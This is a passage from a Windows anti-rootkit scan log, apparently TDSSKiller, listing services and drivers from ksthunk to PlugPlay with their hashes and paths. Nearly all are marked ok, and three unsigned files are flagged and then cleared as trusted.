21:57:01.0158 0x1a10 [ 6869281E78CB31A43E969F06B57347C4, 866A23E69B32A78D378D6CB3B3DA3695FFDFF0FEC3C9F68C8C3F988DF417044B ] ksthunk C:\Windows\system32\drivers\ksthunk.sys
21:57:01.0247 0x1a10 ksthunk - ok
21:57:01.0303 0x1a10 [ 6AB66E16AA859232F64DEB66887A8C9C, 5F2B579BEA8098A2994B0DECECDAE7B396E7B5DC5F09645737B9F28BEEA77FFF ] KtmRm C:\Windows\system32\msdtckrm.dll
21:57:01.0400 0x1a10 KtmRm - ok
21:57:01.0472 0x1a10 [ 4891EE13FA79B9D6B856F49AD69281B2, 5A9488BA1798020443400D82BA18D5A3EA766F49C2C78CD417C1DE45F64CD7BA ] L6PODHDBEAN C:\Windows\system32\Drivers\L6PODHDBEAN64.sys
21:57:01.0631 0x1a10 L6PODHDBEAN - ok
21:57:01.0705 0x1a10 [ D9F42719019740BAA6D1C6D536CBDAA6, 8757599D0AE5302C4CE50861BEBA3A8DD14D7B0DBD916FD5404133688CDFCC40 ] LanmanServer C:\Windows\system32\srvsvc.dll
21:57:01.0790 0x1a10 LanmanServer - ok
21:57:01.0819 0x1a10 [ 851A1382EED3E3A7476DB004F4EE3E1A, B1C67F47DD594D092E6E258F01DF5E7150227CE3131A908A244DEE9F8A1FABF9 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
21:57:01.0898 0x1a10 LanmanWorkstation - ok
21:57:01.0942 0x1a10 [ 1538831CF8AD2979A04C423779465827, E1729B0CC4CEEE494A0B8817A8E98FF232E3A32FB023566EF0BC71A090262C0C ] lltdio C:\Windows\system32\DRIVERS\lltdio.sys
21:57:02.0028 0x1a10 lltdio - ok
21:57:02.0094 0x1a10 [ C1185803384AB3FEED115F79F109427F, 0414FE73532DCAB17E906438A14711E928CECCD5F579255410C62984DD652700 ] lltdsvc C:\Windows\System32\lltdsvc.dll
21:57:02.0206 0x1a10 lltdsvc - ok
21:57:02.0230 0x1a10 [ F993A32249B66C9D622EA5592A8B76B8, EE64672A990C6145DC5601E2B8CDBE089272A72732F59AF9865DCBA8B1717E70 ] lmhosts C:\Windows\System32\lmhsvc.dll
21:57:02.0328 0x1a10 lmhosts - ok
21:57:02.0387 0x1a10 [ 1A93E54EB0ECE102495A51266DCDB6A6, DB6AA86AA36C3A7988BE96E87B5D3251BE7617C54EE8F894D9DC2E267FE3255B ] LSI_FC C:\Windows\system32\drivers\lsi_fc.sys
21:57:02.0417 0x1a10 LSI_FC - ok
21:57:02.0465 0x1a10 [ 1047184A9FDC8BDBFF857175875EE810, F2251EDB7736A26D388A0C5CC2FE5FB9C5E109CBB1E3800993554CB21D81AE4B ] LSI_SAS C:\Windows\system32\drivers\lsi_sas.sys
21:57:02.0496 0x1a10 LSI_SAS - ok
21:57:02.0524 0x1a10 [ 30F5C0DE1EE8B5BC9306C1F0E4A75F93, 88D5740A4E9CC3FA80FA18035DAB441BDC5A039622D666BFDAA525CC9686BD06 ] LSI_SAS2 C:\Windows\system32\drivers\lsi_sas2.sys
21:57:02.0544 0x1a10 LSI_SAS2 - ok
21:57:02.0594 0x1a10 [ 0504EACAFF0D3C8AED161C4B0D369D4A, 4D272237C189646F5C80822FD3CBA7C2728E482E2DAAF7A09C8AEF811C89C54D ] LSI_SCSI C:\Windows\system32\drivers\lsi_scsi.sys
21:57:02.0639 0x1a10 LSI_SCSI - ok
21:57:02.0663 0x1a10 [ 43D0F98E1D56CCDDB0D5254CFF7B356E, 5BA498183B5C4996C694CB0A9A6B66CE6C7A460F6C91BEB9F305486FCC3B7B22 ] luafv C:\Windows\system32\drivers\luafv.sys
21:57:02.0735 0x1a10 luafv - ok
21:57:02.0806 0x1a10 [ 25FAEF6CCFF6D9912A65641AE60711EB, AD83C6DE72D7C416EC7765DBA2EF41B32084980EE071A17CA2C360CDF91212AE ] MBAMChameleon C:\Windows\system32\drivers\MBAMChameleon.sys
21:57:02.0846 0x1a10 MBAMChameleon - ok
21:57:03.0083 0x1a10 [ 4988F9AEE3B9E4545975CAA9381DB0EF, DC6030468783BF02DAA6922A5469D73D56642963F7212398A959AD7915D9E76B ] MBAMFarflt C:\Windows\system32\DRIVERS\farflt.sys
21:57:03.0113 0x1a10 MBAMFarflt - ok
21:57:03.0143 0x1a10 [ 149E252142950594695178971748D056, 6F3EBAD6CB87A21B457AA09CA56EF01B48D4478CB94BD09834E72BE9A41265A4 ] MBAMProtection C:\Windows\system32\drivers\mbam.sys
21:57:03.0169 0x1a10 MBAMProtection - ok
21:57:03.0571 0x1a10 [ FEAF4E98C93BC3512B8108D2F534A3BA, 6D93EF21DB9BFFACC1241E823F9BB7719B9395D64BBF952874CFF015B7930D92 ] MBAMService C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe
21:57:03.0778 0x1a10 MBAMService - ok
21:57:03.0909 0x1a10 [ 94FCA94EE7937EA3ED75F39DE4C8E292, CD41ACBC70412B61C844ADC26413728A09D60983A464327A285C80E08D37F8B6 ] MBAMSwissArmy C:\Windows\system32\drivers\MBAMSwissArmy.sys
21:57:03.0939 0x1a10 MBAMSwissArmy - ok
21:57:03.0999 0x1a10 [ 530382A92353754F22DF0183D6A74BF8, B193668DFAD72D71EDA02A91E13A2B17322803F8F08FD737101A5951580D7DB3 ] MBAMWebProtection C:\Windows\system32\drivers\mwac.sys
21:57:04.0029 0x1a10 MBAMWebProtection - ok
21:57:04.0109 0x1a10 [ 0BE09CD858ABF9DF6ED259D57A1A1663, 2FD28889B93C8E801F74C1D0769673A461671E0189D0A22C94509E3F0EEB7428 ] Mcx2Svc C:\Windows\system32\Mcx2Svc.dll
21:57:04.0149 0x1a10 Mcx2Svc - ok
21:57:04.0319 0x1a10 [ 7CF1B716372B89568AE4C0FE769F5869, 0D70A7A594BCFBB26D7249C0F4B0AF9EF874F2318B3FDCE44648CC61279594ED ] MDM C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe
21:57:04.0361 0x1a10 MDM - detected UnsignedFile.Multi.Generic ( 1 )
21:57:05.0055 0x1a10 Detect skipped due to KSN trusted
21:57:05.0055 0x1a10 MDM - ok
21:57:05.0095 0x1a10 [ A55805F747C6EDB6A9080D7C633BD0F4, 2DA0E83BF3C8ADEF6F551B6CC1C0A3F6149CDBE6EC60413BA1767C4DE425A728 ] megasas C:\Windows\system32\drivers\megasas.sys
21:57:05.0131 0x1a10 megasas - ok
21:57:05.0163 0x1a10 [ BAF74CE0072480C3B6B7C13B2A94D6B3, 85CBB4949C090A904464F79713A3418338753D20D7FB811E68F287FDAC1DD834 ] MegaSR C:\Windows\system32\drivers\MegaSR.sys
21:57:05.0223 0x1a10 MegaSR - ok
21:57:05.0283 0x1a10 [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] MMCSS C:\Windows\system32\mmcss.dll
21:57:05.0363 0x1a10 MMCSS - ok
21:57:05.0433 0x1a10 [ 800BA92F7010378B09F9ED9270F07137, 94F9AF9E1BE80AE6AC39A2A74EF9FAB115DCAACC011D07DFA8D6A1DDC8A93342 ] Modem C:\Windows\system32\drivers\modem.sys
21:57:05.0523 0x1a10 Modem - ok
21:57:05.0543 0x1a10 [ B03D591DC7DA45ECE20B3B467E6AADAA, 701FB0CAD8138C58507BE28845D3E24CE269A040737C29885944A0D851238732 ] monitor C:\Windows\system32\DRIVERS\monitor.sys
21:57:05.0593 0x1a10 monitor - ok
21:57:05.0633 0x1a10 [ 7D27EA49F3C1F687D357E77A470AEA99, 7FE7CAF95959F127C6D932C01D539C06D80273C49A09761F6E8331C05B1A7EE7 ] mouclass C:\Windows\system32\DRIVERS\mouclass.sys
21:57:05.0663 0x1a10 mouclass - ok
21:57:05.0703 0x1a10 [ D3BF052C40B0C4166D9FD86A4288C1E6, 5E65264354CD94E844BF1838CA1B8E49080EFA34605A32CF2F6A47A2B97FC183 ] mouhid C:\Windows\system32\drivers\mouhid.sys
21:57:05.0763 0x1a10 mouhid - ok
21:57:05.0831 0x1a10 [ 072D8646E23ECF8A3F5F0157017B4DB6, EBFB1459ECC5AF94C94FB49CEBC724542612680F0777E24B5AA6E062C0EE5D94 ] mountmgr C:\Windows\system32\drivers\mountmgr.sys
21:57:05.0871 0x1a10 mountmgr - ok
21:57:05.0933 0x1a10 [ 0EACD4459D14FBB121A0F8202F170225, 6C63A3D69D6A44E6E03863D2256A5C6EF2DCA56B18DC90B8F3AE8C8DF5D303EF ] MozillaMaintenance C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
21:57:05.0993 0x1a10 MozillaMaintenance - ok
21:57:06.0093 0x1a10 [ 3665AB2F67F4024F5F3F80335ED5322A, BE3DC246F176E00D7611A7E16FBC22615199F49EBCB4C90B0C107294E592BF8D ] MpFilter C:\Windows\system32\DRIVERS\MpFilter.sys
21:57:06.0135 0x1a10 MpFilter - ok
21:57:06.0191 0x1a10 [ A44B420D30BD56E145D6A2BC8768EC58, B1E4DCA5A1008FA7A0492DC091FB2B820406AE13FD3D44F124E89B1037AF09B8 ] mpio C:\Windows\system32\drivers\mpio.sys
21:57:06.0266 0x1a10 mpio - ok
21:57:06.0322 0x1a10 [ 6C38C9E45AE0EA2FA5E551F2ED5E978F, 5A3FA2F110029CB4CC4384998EDB59203FDD65EC45E01B897FB684F8956EAD20 ] mpsdrv C:\Windows\system32\drivers\mpsdrv.sys
21:57:06.0381 0x1a10 mpsdrv - ok
21:57:06.0461 0x1a10 [ 54FFC9C8898113ACE189D4AA7199D2C1, 65F585C87F3F710FD5793FDFA96B740AD8D4317B0C120F4435CCF777300EA4F2 ] MpsSvc C:\Windows\system32\mpssvc.dll
21:57:06.0601 0x1a10 MpsSvc - ok
21:57:06.0658 0x1a10 [ 98DB1790F0A584E0A2528B92B052417F, 9AA04CA73AFE599810CD233B9CEC212E16D44DCEDF5C7D0181C7257F498068B5 ] MRxDAV C:\Windows\system32\drivers\mrxdav.sys
21:57:06.0769 0x1a10 MRxDAV - ok
21:57:06.0803 0x1a10 [ F77E8ABD746B93B9B4F9C13250302C47, 7A6B705DCFA540E90A2A10F8B245CFF7BCB018152EF67D4B988366386E67AE10 ] mrxsmb C:\Windows\system32\DRIVERS\mrxsmb.sys
21:57:06.0863 0x1a10 mrxsmb - ok
21:57:06.0934 0x1a10 [ FF1B4AF370481C25B078FEAEE5455EDC, 596DE4DB5B29F99CD89038B9426000E42D47A27FEF56135F219C83F94B10C1E5 ] mrxsmb10 C:\Windows\system32\DRIVERS\mrxsmb10.sys
21:57:07.0002 0x1a10 mrxsmb10 - ok
21:57:07.0024 0x1a10 [ 125B7C9D7372711EDBD5BFEE2E33CE60, 53ED38EBD558C1EE46EE0D3E39964730237991994946BE494806F7EC4A62D966 ] mrxsmb20 C:\Windows\system32\DRIVERS\mrxsmb20.sys
21:57:07.0064 0x1a10 mrxsmb20 - ok
21:57:07.0094 0x1a10 [ C25F0BAFA182CBCA2DD3C851C2E75796, 643E158A0948DF331807AEAA391F23960362E46C0A0CF6D22A99020EAE7B10F8 ] msahci C:\Windows\system32\drivers\msahci.sys
21:57:07.0134 0x1a10 msahci - ok
21:57:07.0144 0x1a10 [ DB801A638D011B9633829EB6F663C900, B34FD33A215ACCF2905F4B7D061686CDB1CB9C652147AF56AE14686C1F6E3C74 ] msdsm C:\Windows\system32\drivers\msdsm.sys
21:57:07.0184 0x1a10 msdsm - ok
21:57:07.0214 0x1a10 [ DE0ECE52236CFA3ED2DBFC03F28253A8, 2FBBEC4CACB5161F68D7C2935852A5888945CA0F107CF8A1C01F4528CE407DE3 ] MSDTC C:\Windows\System32\msdtc.exe
21:57:07.0284 0x1a10 MSDTC - ok
21:57:07.0334 0x1a10 [ AA3FB40E17CE1388FA1BEDAB50EA8F96, 69F93E15536644C8FD679A20190CFE577F4985D3B1B4A4AA250A168615AE1E99 ] Msfs C:\Windows\system32\drivers\Msfs.sys
21:57:07.0415 0x1a10 Msfs - ok
21:57:07.0435 0x1a10 [ F9D215A46A8B9753F61767FA72A20326, 6F76642B45E0A7EF6BCAB8B37D55CCE2EAA310ED07B76D43FCB88987C2174141 ] mshidkmdf C:\Windows\System32\drivers\mshidkmdf.sys
21:57:07.0496 0x1a10 mshidkmdf - ok
21:57:07.0526 0x1a10 [ D916874BBD4F8B07BFB7FA9B3CCAE29D, B229DA150713DEDBC4F05386C9D9DC3BC095A74F44F3081E88311AB73BC992A1 ] msisadrv C:\Windows\system32\drivers\msisadrv.sys
21:57:07.0556 0x1a10 msisadrv - ok
21:57:07.0604 0x1a10 [ 808E98FF49B155C522E6400953177B08, F873F5BFF0984C5165DF67E92874D3F6EB8D86F9B5AD17013A0091CA33A1A3D5 ] MSiSCSI C:\Windows\system32\iscsiexe.dll
21:57:07.0691 0x1a10 MSiSCSI - ok
21:57:07.0697 0x1a10 msiserver - ok
21:57:07.0731 0x1a10 [ 49CCF2C4FEA34FFAD8B1B59D49439366, E5752EA57C7BDAD5F53E3BC441A415E909AC602CAE56234684FB8789A20396C7 ] MSKSSRV C:\Windows\system32\drivers\MSKSSRV.sys
21:57:07.0788 0x1a10 MSKSSRV - ok
21:57:07.0881 0x1a10 [ 5ADED2C1239D7BD798E2C4EF9EAA1FA3, 6A462DAC110015F3E59610202714120C557674019A0196680B72031C50D7C474 ] MsMpSvc c:\Program Files\Microsoft Security Client\MsMpEng.exe
21:57:07.0931 0x1a10 MsMpSvc - ok
21:57:07.0952 0x1a10 [ BDD71ACE35A232104DDD349EE70E1AB3, 27464A66868513BE6A01B75D7FC5B0D6B71842E4E20CE3F76B15C071A0618BBB ] MSPCLOCK C:\Windows\system32\drivers\MSPCLOCK.sys
21:57:08.0017 0x1a10 MSPCLOCK - ok
21:57:08.0031 0x1a10 [ 4ED981241DB27C3383D72092B618A1D0, E12F121E641249DB3491141851B59E1496F4413EDF58E863388F1C229838DFCC ] MSPQM C:\Windows\system32\drivers\MSPQM.sys
21:57:08.0111 0x1a10 MSPQM - ok
21:57:08.0158 0x1a10 [ 759A9EEB0FA9ED79DA1FB7D4EF78866D, 64E3BC613EC4872B1B344CBF71EE15BE195592E3244C1EE099C6F8B95A40F133 ] MsRPC C:\Windows\system32\drivers\MsRPC.sys
21:57:08.0199 0x1a10 MsRPC - ok
21:57:08.0234 0x1a10 [ 0EED230E37515A0EAEE3C2E1BC97B288, B1D8F8A75006B6E99214CA36D27A8594EF8D952F315BEB201E9BAC9DE3E64D42 ] mssmbios C:\Windows\system32\drivers\mssmbios.sys
21:57:08.0264 0x1a10 mssmbios - ok
21:57:08.0274 0x1a10 [ 2E66F9ECB30B4221A318C92AC2250779, DF175E1AB6962303E57F26DAE5C5C1E40B8640333F3E352A64F6A5F1301586CD ] MSTEE C:\Windows\system32\drivers\MSTEE.sys
21:57:08.0356 0x1a10 MSTEE - ok
21:57:08.0418 0x1a10 [ 7EA404308934E675BFFDE8EDF0757BCD, 306CD02D89CFCFE576242360ED5F9EEEDCAFC43CD43B7D2977AE960F9AEC3232 ] MTConfig C:\Windows\system32\drivers\MTConfig.sys
21:57:08.0448 0x1a10 MTConfig - ok
21:57:08.0468 0x1a10 [ F9A18612FD3526FE473C1BDA678D61C8, 32F7975B5BAA447917F832D9E3499B4B6D3E90D73F478375D0B70B36C524693A ] Mup C:\Windows\system32\Drivers\mup.sys
21:57:08.0518 0x1a10 Mup - ok
21:57:08.0579 0x1a10 [ 582AC6D9873E31DFA28A4547270862DD, BD540499F74E8F59A020D935D18E36A3A97C1A6EC59C8208436469A31B16B260 ] napagent C:\Windows\system32\qagentRT.dll
21:57:08.0693 0x1a10 napagent - ok
21:57:08.0794 0x1a10 [ 1EA3749C4114DB3E3161156FFFFA6B33, 54C2E77BCE1037711A11313AC25B8706109098C10A31AA03AEB7A185E97800D7 ] NativeWifiP C:\Windows\system32\DRIVERS\nwifi.sys
21:57:08.0876 0x1a10 NativeWifiP - ok
21:57:08.0942 0x1a10 [ F7309F42555F8AAB7144A51A1F2585B0, 065277A8AFAEE3888C997A76D2F751070F92DF4C3354D16B194860B4BDAFF937 ] NDIS C:\Windows\system32\drivers\ndis.sys
21:57:09.0032 0x1a10 NDIS - ok
21:57:09.0115 0x1a10 [ 9F9A1F53AAD7DA4D6FEF5BB73AB811AC, D7E5446E83909AE25506BB98FBDD878A529C87963E3C1125C4ABAB25823572BC ] NdisCap C:\Windows\system32\DRIVERS\ndiscap.sys
21:57:09.0193 0x1a10 NdisCap - ok
21:57:09.0222 0x1a10 [ 30639C932D9FEF22B31268FE25A1B6E5, 32873D95339600F6EEFA51847D12C563FF01F320DC59055B242FA2887C99F9D6 ] NdisTapi C:\Windows\system32\DRIVERS\ndistapi.sys
21:57:09.0317 0x1a10 NdisTapi - ok
21:57:09.0338 0x1a10 [ 136185F9FB2CC61E573E676AA5402356, BA3AD0A33416DA913B4242C6BE8C3E5812AD2B20BA6C11DD3094F2E8EB56E683 ] Ndisuio C:\Windows\system32\DRIVERS\ndisuio.sys
21:57:09.0407 0x1a10 Ndisuio - ok
21:57:09.0470 0x1a10 [ 53F7305169863F0A2BDDC49E116C2E11, 881E9346D3C02405B7850ADC37E720990712EC9C666A0CE96E252A487FD2CE77 ] NdisWan C:\Windows\system32\DRIVERS\ndiswan.sys
21:57:09.0565 0x1a10 NdisWan - ok
21:57:09.0601 0x1a10 [ 015C0D8E0E0421B4CFD48CFFE2825879, 4242E2D42CCFC859B2C0275C5331798BC0BDA68E51CF4650B6E64B1332071023 ] NDProxy C:\Windows\system32\drivers\NDProxy.sys
21:57:09.0684 0x1a10 NDProxy - ok
21:57:09.0724 0x1a10 [ 86743D9F5D2B1048062B14B1D84501C4, DBF6D6A60AB774FCB0F464FF2D285A7521D0A24006687B243AB46B17D8032062 ] NetBIOS C:\Windows\system32\DRIVERS\netbios.sys
21:57:09.0849 0x1a10 NetBIOS - ok
21:57:09.0952 0x1a10 [ 734837208CAFD6E0959A7A0333C95C9D, 0B7CD6E3CE43ABE021DBE6516492E326265EC0273F2F4297187CE70602CB8CE1 ] NetBT C:\Windows\system32\DRIVERS\netbt.sys
21:57:10.0056 0x1a10 NetBT - ok
21:57:10.0081 0x1a10 [ 00A54A6CEDF599AABB72C20E0815BC37, 09835A43E1A17396BDC88BB38EF66EA8854913040347D9893EBF8550D0AA1452 ] Netlogon C:\Windows\system32\lsass.exe
21:57:10.0115 0x1a10 Netlogon - ok
21:57:10.0179 0x1a10 [ 847D3AE376C0817161A14A82C8922A9E, 37AE692B3481323134125EF58F2C3CBC20177371AF2F5874F53DD32A827CB936 ] Netman C:\Windows\System32\netman.dll
21:57:10.0300 0x1a10 Netman - ok
21:57:10.0349 0x1a10 [ 10D5997E2F5F16FE3BC3BD1A4BF31EA8, 0DDC4855C00A581A35AB2A11D2AAACC844C460F13F524DD9B92B8F00C31173A7 ] NetMsmqActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
21:57:10.0400 0x1a10 NetMsmqActivator - ok
21:57:10.0409 0x1a10 [ 10D5997E2F5F16FE3BC3BD1A4BF31EA8, 0DDC4855C00A581A35AB2A11D2AAACC844C460F13F524DD9B92B8F00C31173A7 ] NetPipeActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
21:57:10.0447 0x1a10 NetPipeActivator - ok
21:57:10.0500 0x1a10 [ 5F28111C648F1E24F7DBC87CDEB091B8, 2E8645285921EDB98BB2173E11E57459C888D52E80D85791D169C869DE8813B9 ] netprofm C:\Windows\System32\netprofm.dll
21:57:10.0603 0x1a10 netprofm - ok
21:57:10.0612 0x1a10 [ 10D5997E2F5F16FE3BC3BD1A4BF31EA8, 0DDC4855C00A581A35AB2A11D2AAACC844C460F13F524DD9B92B8F00C31173A7 ] NetTcpActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
21:57:10.0645 0x1a10 NetTcpActivator - ok
21:57:10.0654 0x1a10 [ 10D5997E2F5F16FE3BC3BD1A4BF31EA8, 0DDC4855C00A581A35AB2A11D2AAACC844C460F13F524DD9B92B8F00C31173A7 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
21:57:10.0688 0x1a10 NetTcpPortSharing - ok
21:57:10.0722 0x1a10 [ 77889813BE4D166CDAB78DDBA990DA92, 2EF531AE502B943632EEC66A309A8BFCDD36120A5E1473F4AAF3C2393AD0E6A3 ] nfrd960 C:\Windows\system32\drivers\nfrd960.sys
21:57:10.0789 0x1a10 nfrd960 - ok
21:57:10.0866 0x1a10 [ CE5F6E635FE4506AE6F2D6EB87425128, 3DB5ECF7CD2F2C3C010AA40CE57F1B3856E284BBA359FBC41A1B340E3180FD5F ] NisDrv C:\Windows\system32\DRIVERS\NisDrvWFP.sys
21:57:10.0902 0x1a10 NisDrv - ok
21:57:10.0980 0x1a10 [ D630B510E1E3FF6BA12B705F47F115D9, 05D76065D5D9A82E53EA18CD2D0184338681A7BBD3CD5D6C44D1FA5CB1C63640 ] NisSrv c:\Program Files\Microsoft Security Client\NisSrv.exe
21:57:11.0040 0x1a10 NisSrv - ok
21:57:11.0112 0x1a10 [ 8B301D474B478E9A92823BAB50A7BC49, 8181816035F41B1DABEC05E65E4F67BCD785F56760A61F1049E91BA39D42F01D ] NlaSvc C:\Windows\System32\nlasvc.dll
21:57:11.0214 0x1a10 NlaSvc - ok
21:57:11.0258 0x1a10 [ 1E4C4AB5C9B8DD13179BBDC75A2A01F7, D8957EF7060A69DBB3CD6B2C45B1E4143592AB8D018471E17AC04668157DC67F ] Npfs C:\Windows\system32\drivers\Npfs.sys
21:57:11.0365 0x1a10 Npfs - ok
21:57:11.0398 0x1a10 [ 668B9EFF5CCA4542F435D2CD9CE3C778, 7409EF35D1DC0DE2BAB752694981FFA1F1855C7F11310366B80BD1EC3513262E ] nsi C:\Windows\system32\nsisvc.dll
21:57:11.0465 0x1a10 nsi - ok
21:57:11.0485 0x1a10 [ BE313E566EEA2A4B7F9AAC9782A567D4, 377C624737B1A4FBC1DFF988F029B8ED9A368827C33A4FEEBA1B7937A87C2B47 ] nsiproxy C:\Windows\system32\drivers\nsiproxy.sys
21:57:11.0653 0x1a10 nsiproxy - ok
21:57:11.0806 0x1a10 [ 7FD5A7FB8F55254E9AF5666C653AF3CA, 5EE9805BB4A952AE455D08953FF12E55879776A521B3333F2730AC552DC17C48 ] Ntfs C:\Windows\system32\drivers\Ntfs.sys
21:57:11.0907 0x1a10 Ntfs - ok
21:57:12.0005 0x1a10 [ 9899284589F75FA8724FF3D16AED75C1, 181188599FD5D4DE33B97010D9E0CAEABAB9A3EF50712FE7F9AA0735CD0666D6 ] Null C:\Windows\system32\drivers\Null.sys
21:57:12.0111 0x1a10 Null - ok
21:57:12.0197 0x1a10 [ A85B4F2EF3A7304A5399EF0526423040, E45854691BA6AE36E53C2922CC93FF13DC2D84CBE7FE13A2F0B1CE1C16D1D158 ] NVENETFD C:\Windows\system32\DRIVERS\nvm62x64.sys
21:57:12.0296 0x1a10 NVENETFD - ok
21:57:12.0314 0x1a10 [ 0A92CB65770442ED0DC44834632F66AD, 581327F07A68DBD5CC749214BE5F1211FC2CE41C7A4F0656B680AFB51A35ACE7 ] nvraid C:\Windows\system32\drivers\nvraid.sys
21:57:12.0354 0x1a10 nvraid - ok
21:57:12.0407 0x1a10 [ DAB0E87525C10052BF65F06152F37E4A, AD9BFF0D5FD3FFB95C758B478E1F6A9FE45E7B37AEC71EB5070D292FEAAEDF37 ] nvstor C:\Windows\system32\drivers\nvstor.sys
21:57:12.0457 0x1a10 nvstor - ok
21:57:12.0497 0x1a10 [ 270D7CD42D6E3979F6DD0146650F0E05, 752489E54C9004EDCBE1F1F208FFD864DA5C83E59A2DDE6B3E0D63ECA996F76F ] nv_agp C:\Windows\system32\drivers\nv_agp.sys
21:57:12.0527 0x1a10 nv_agp - ok
21:57:12.0591 0x1a10 [ 785F487A64950F3CB8E9F16253BA3B7B, 02445344BD214370A6D48B1CA04921D8EFCB13E676B5648266DD0E076C0822B6 ] odserv C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE
21:57:12.0645 0x1a10 odserv - ok
21:57:12.0666 0x1a10 [ 3589478E4B22CE21B41FA1BFC0B8B8A0, AD2469FC753FE552CB809FF405A9AB23E7561292FE89117E3B3B62057EFF0203 ] ohci1394 C:\Windows\system32\drivers\ohci1394.sys
21:57:12.0731 0x1a10 ohci1394 - ok
21:57:12.0964 0x1a10 [ 8DD366F3B9F16ED722A6A66D956DA27F, 3A61B3D7B0D60CAA801FFDA086BFDDCF9C820CB11114DC60FDC9B30F828CC04F ] omniserv C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe
21:57:13.0038 0x1a10 omniserv - detected UnsignedFile.Multi.Generic ( 1 )
21:57:13.0642 0x1a10 Detect skipped due to KSN trusted
21:57:13.0642 0x1a10 omniserv - ok
21:57:13.0742 0x1a10 OracleJobSchedulerXE - ok
21:57:13.0771 0x1a10 OracleMTSRecoveryService - ok
21:57:13.0777 0x1a10 OracleServiceXE - ok
21:57:13.0853 0x1a10 [ C13CCB0BF754B71943936877F568D40D, C6C9AD431F16AD6B623CFA5EB91F27FE1EAA71CC914FE76A326A0F2B24F36B5D ] OracleXETNSListener C:\projects\oraclexe\app\oracle\product\11.2.0\server\BIN\tnslsnr.exe
21:57:14.0181 0x1a10 OracleXETNSListener - detected UnsignedFile.Multi.Generic ( 1 )
21:57:14.0823 0x1a10 Detect skipped due to KSN trusted
21:57:14.0823 0x1a10 OracleXETNSListener - ok
21:57:14.0893 0x1a10 [ 5A432A042DAE460ABE7199B758E8606C, 6E5D1F477D290905BE27CEBF9572BAC6B05FFEF2FAD901D3C8E11F665F8B9A71 ] ose C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
21:57:14.0923 0x1a10 ose - ok
21:57:14.0981 0x1a10 [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] p2pimsvc C:\Windows\system32\pnrpsvc.dll
21:57:15.0063 0x1a10 p2pimsvc - ok
21:57:15.0103 0x1a10 [ 927463ECB02179F88E4B9A17568C63C3, FEFD3447692C277D59EEC7BF218552C8BB6B8C98C26E973675549628408B94CE ] p2psvc C:\Windows\system32\p2psvc.dll
21:57:15.0153 0x1a10 p2psvc - ok
21:57:15.0183 0x1a10 [ 0086431C29C35BE1DBC43F52CC273887, 0D116D49EF9ABB57DA005764F25E692622210627FC2048F06A989B12FA8D0A80 ] Parport C:\Windows\system32\drivers\parport.sys
21:57:15.0233 0x1a10 Parport - ok
21:57:15.0283 0x1a10 [ E9766131EEADE40A27DC27D2D68FBA9C, 63C295EC96DBD25F1A8B908295CCB86B54F2A77A02AAA11E5D9160C2C1A492B6 ] partmgr C:\Windows\system32\drivers\partmgr.sys
21:57:15.0313 0x1a10 partmgr - ok
21:57:15.0403 0x1a10 [ 3CD83692C43D87088E85E3C916146FFB, 9E812535E8FBA045FDA30F68E9EB2031132C37721D542A2DC9D4C33E2B137FCF ] PcaSvc C:\Windows\System32\pcasvc.dll
21:57:15.0473 0x1a10 PcaSvc - ok
21:57:15.0503 0x1a10 [ 94575C0571D1462A0F70BDE6BD6EE6B3, 7139BAC653EA94A3DD3821CAB35FC5E22F4CCA5ACC2BAABDAA27E4C3C8B27FC9 ] pci C:\Windows\system32\drivers\pci.sys
21:57:15.0543 0x1a10 pci - ok
21:57:15.0583 0x1a10 [ B5B8B5EF2E5CB34DF8DCF8831E3534FA, F2A7CC645B96946CC65BF60E14E70DC09C848D27C7943CE5DEA0C01A6B863480 ] pciide C:\Windows\system32\drivers\pciide.sys
21:57:15.0603 0x1a10 pciide - ok
21:57:15.0673 0x1a10 [ B2E81D4E87CE48589F98CB8C05B01F2F, 6763BEE7270A4873B3E131BFB92313E2750FCBD0AD73C23D1C4F98F7DF73DE14 ] pcmcia C:\Windows\system32\drivers\pcmcia.sys
21:57:15.0713 0x1a10 pcmcia - ok
21:57:15.0773 0x1a10 [ D6B9C2E1A11A3A4B26A182FFEF18F603, BBA5FE08B1DDD6243118E11358FD61B10E850F090F061711C3CB207CE5FBBD36 ] pcw C:\Windows\system32\drivers\pcw.sys
21:57:15.0813 0x1a10 pcw - ok
21:57:15.0893 0x1a10 [ EA4D67448BE493D543F1730D6CD04694, 24717C5E41B7CA522F3330EF2228B6685E710A5259396E9887A1C1E7A413F8CA ] PEAUTH C:\Windows\system32\drivers\peauth.sys
21:57:16.0030 0x1a10 PEAUTH - ok
21:57:16.0130 0x1a10 [ B9B0A4299DD2D76A4243F75FD54DC680, BBF62E9628131FA396EB08D63B76D2D5FBDD61339E92B759125A066470D1C039 ] PeerDistSvc C:\Windows\system32\peerdistsvc.dll
21:57:16.0287 0x1a10 PeerDistSvc - ok
21:57:16.0457 0x1a10 [ E495E408C93141E8FC72DC0C6046DDFA, 489B957DADA0DC128A09468F1AD082DCC657E86053208EA06A12937BE86FB919 ] PerfHost C:\Windows\SysWow64\perfhost.exe
21:57:16.0507 0x1a10 PerfHost - ok
21:57:16.0667 0x1a10 [ BC5F8C5C7ACCD0B884FCB8B67616F537, 5C99E9D7E7095CED52B1F5F4A569E54F124602C573DD2B25731E0D57FDA22A27 ] pla C:\Windows\system32\pla.dll
21:57:16.0787 0x1a10 pla - ok
21:57:16.0837 0x1a10 [ 25FBDEF06C4D92815B353F6E792C8129, 57D9764AE6BCE33B242C399CDFC10DD405975BD6411CA8C75FBCD06EEB8442A9 ] PlugPlay C:\Windows\system32\umpnpmgr.dll
21:57:16.0897 0x1a10 PlugPlay - ok
